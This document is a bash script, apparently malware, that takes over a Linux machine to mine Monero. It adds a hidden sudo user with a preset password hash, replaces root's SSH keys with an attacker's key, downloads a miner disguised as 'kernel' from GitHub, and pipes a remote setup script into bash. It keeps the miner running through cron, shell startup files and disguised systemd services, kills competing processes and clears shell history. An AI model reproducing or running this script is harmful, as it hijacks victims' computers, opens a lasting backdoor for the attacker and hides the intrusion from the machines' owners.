
#!/bin/bash

USERNAME="mysqld"
HASHED_PASS='$6$BmyFRFVm74WLGFqO$2s1sTXYHy0H/G63Sif1Syg55lfY4WOZBNY3IGtYrjTF8We5AsX0ooh8b8s0qCNhEB6rMYzaihSw7tso4LZepc0'
HOSTNAME=$(hostname)
PORT=80
# Replace nameserver entries in /etc/resolv.conf with 1.1.1.1 and 8.8.8.8
if sudo -n true 2>/dev/null; then
  sudo bash -c 'echo -e "nameserver 1.1.1.1\nnameserver 8.8.8.8" > /etc/resolv.conf'
elif [ -w /etc/resolv.conf ]; then
  echo -e "nameserver 1.1.1.1\nnameserver 8.8.8.8" > /etc/resolv.conf
fi



#payloads downloader function
payload_downloader() {

user_type=$1

if [ "$user_type" == "root" ] ;then

    sudo mkdir -p /usr/.local && sudo mkdir -p /usr/.shares
    sudo curl -L -k https://raw.githubusercontent.com/blackkitty02020/repo1/refs/heads/main/kernel -o /usr/.local/kernel
    sudo curl -L -k https://raw.githubusercontent.com/blackkitty02020/repo1/refs/heads/main/config.json -o /usr/.local/config.json


fi
if [ "$user_type" == "normal1" ];then

    mkdir -p $HOME/.local
    curl -L -k https://raw.githubusercontent.com/blackkitty02020/repo1/refs/heads/main/kernel -o $HOME/.local/kernel
    curl -L -k https://raw.githubusercontent.com/blackkitty02020/repo1/refs/heads/main/config.json -o $HOME/.local/config.json
 
fi

}

#check current user is root or not
if  sudo -n true 2>/dev/null ; then
    echo "[*] Current user has root privileges.Script will run with sudo privileges."
    ROOT=true
else
    echo "[!] Current user does NOT have root .Script will attempt to run commands without sudo."
    ROOT=false
fi



#start miner depend on user type
if $ROOT;then #root user

#add backup user
    echo "[*] Creating user '$USERNAME' with given password hash..."
    sudo useradd --no-create-home --shell /bin/bash -p "$HASHED_PASS" "$USERNAME"
    sudo usermod -aG sudo mysqld
    sudo usermod -aG whell mysqld
    sudo usermod -aG root mysqld

    echo "[*] Added User into sudoers"
    echo "mysqld ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

    echo "[+] User '$USERNAME' created with root privileges."

    echo "[*] Setting up SSH key for root user..."

    if [ -d /root/.ssh ] ; then
        echo ".ssh folder already exits, skipping creation."
    else
        echo ".ssh folder does not exist, creating..."
        sudo mkdir -p /root/.ssh
    fi



sudo rm -rf /root/.ssh
sudo mkdir -p /root/.ssh
sudo chmod 700 /root/.ssh
sudo bash -c 'echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJO5VmgyYQjzSfsxbnbCHq19ZsdQXuf1lIk41XDrCuIC Generated By Termius" >> /root/.ssh/authorized_keys'
sudo chmod 600 /root/.ssh/authorized_keys
echo "[+] SSH public key added to root's authorized_keys."

payload_downloader root

sudo ln -sf /usr/.local/kernel /usr/local/bin/kernel
sudo chmod +x /usr/.local/kernel


sudo sed -i 's/"pass": *"[^"]*",/"pass": "'"$HOSTNAME"'",/' /usr/.local/config.json
sudo sed -i 's/"url": *"[^"]*",/"url": "gulf.moneroocean.stream:'$PORT'",/' /usr/.local/config.json


sudo tee /usr/.local/run.sh > /dev/null << 'EOF'
#!/bin/bash
if ! pidof kernel >/dev/null; then
    nice kernel
else
    sleep 5m
fi
EOF

sudo chmod +x /usr/.local/run.sh

sudo touch ~/.profile ; sudo grep -q "/usr/.local/run.sh >/dev/null 2>&1 &" ~/.profile || { echo "nohup $HOME/.local/run.sh >/dev/null 2>&1 &" >> ~/.profile && echo "[*] .profile added" ; }
sudo touch ~/.bashrc ; sudo grep -q "/usr/.local/run.sh >/dev/null 2>&1 &" ~/.bashrc || { echo "nohup $HOME/.local/run.sh >/dev/null 2>&1 &" >> ~/.bashrc && echo "[*] .bashrc added" ; }

    #add cronjob to run every 3 minutes
    if sudo crontab -l 2>/dev/null | grep -q "/usr/.local/run.sh"; then #check if cronjob already exists
        echo "[*] Cronjob for miner updater already exists. Skipping addition."
        :
    else
        (sudo crontab -l 2>/dev/null; echo "*/3 * * * * /usr/.local/run.sh") | crontab -
        echo "[+] Cronjob added to run miner updater every 3 minutes."
    fi

#create daemon killer script
sudo tee /usr/.local/daemon.sh > /dev/null << 'EOF'
#!/bin/bash
while true; do
    if pgrep daemon > /dev/null; then
        pkill -9 daemon
    fi
    sleep 10
done
EOF

sudo chmod +x /usr/.local/daemon.sh

echo " created daemon miner killer script "

sudo tee /etc/systemd/system/daemon.service > /dev/null << 'EOF'
[Unit]
Description=apache daemon

[Service]
ExecStart=/usr/.local/daemon.sh
Restart=always
RestartSec=5
Nice=5

[Install]
WantedBy=multi-user.target
EOF

sudo echo "created daemon-kill service"

sudo tee /etc/systemd/system/kernel-updater.service > /dev/null << 'EOF'
[Unit]
Description=Update Service

[Service]
ExecStart=/usr/.local/run.sh
Restart=always
Nice=10

[Install]
WantedBy=multi-user.target
EOF

sudo systemctl daemon-reexec
sudo systemctl daemon-reload
sudo systemctl enable  kernel-updater.service
sudo systemctl enable  daemon.service

sudo systemctl restart  kernel-updater.service
sudo systemctl restart  daemon.service

echo "done"



else #normal user mining process
    if [ -d $HOME ];then
        echo "[*] Normal user $whoami has home directory $HOME exists."
            if [ -d ~/.ssh ] ; then
                echo ".ssh folder already exits, skipping creation."
            else
                echo ".ssh folder does not exist, creating..."
                mkdir -p $HOME/.ssh
            fi

        echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJO5VmgyYQjzSfsxbnbCHq19ZsdQXuf1lIk41XDrCuIC Generated By Termius' >> $HOME/.ssh/authorized_keys && echo "[*] ssh key added to $USER"s authorized_keys.
        payload_downloader normal1
        chmod +x ~/.local/kernel


        sed -i 's/"pass": *"[^"]*",/"pass": "'"$HOSTNAME"'",/' ~/.local/config.json
        sed -i 's/"url": *"[^"]*",/"url": "gulf.moneroocean.stream:'$PORT'",/' ~/.local/config.json


tee $HOME/.local/run.sh > /dev/null << 'EOF'
#!/bin/bash
if ! pidof kernel >/dev/null; then
    nohup ~/.local/kernel >/dev/null 2>&1 &
else
    sleep 5m;
fi
EOF

    chmod +x $HOME/.local/run.sh

    touch ~/.profile ; grep -q "$HOME/.local/run.sh" ~/.profile || { echo "$HOME/.local/run.sh &" >> ~/.profile && echo "[*] .profile added" ; } #add run.sh to .profile
    touch ~/.bashrc ; grep -q "$HOME/.local/run.sh" ~/.bashrc || { echo "$HOME/.local/run.sh &" >> ~/.bashrc && echo "[*] .bashrc added" ; } #add run.sh to .bashrc

    if crontab -l 2>/dev/null | grep -q "$HOME/.local/run.sh"; then #check if cronjob already exists
        echo "[*] Cronjob for miner updater already exists. Skipping addition."
        :
    else
        (crontab -l 2>/dev/null; echo "*/3 * * * * $HOME/.local/run.sh") | crontab -
        echo "[+] Cronjob added to run miner updater every 3 minutes."
    fi

    $HOME/.local/run.sh >/dev/null >/dev/null 2>&1


else

    echo "[!] user $whoami has no home directory. mining with last option."
    curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 86ctquRHLSZ7EY6WnHLcRaHoswg9yikhAUzVTi9P4RMyGXaauSrKPqS66tBzq82SXgMU7Q25TbTp2HKCKa3JX8GTQr1mGpL
    

fi



fi



#chear history

history -c && > ~/.bash_history && unset HISTFILE && set +o history


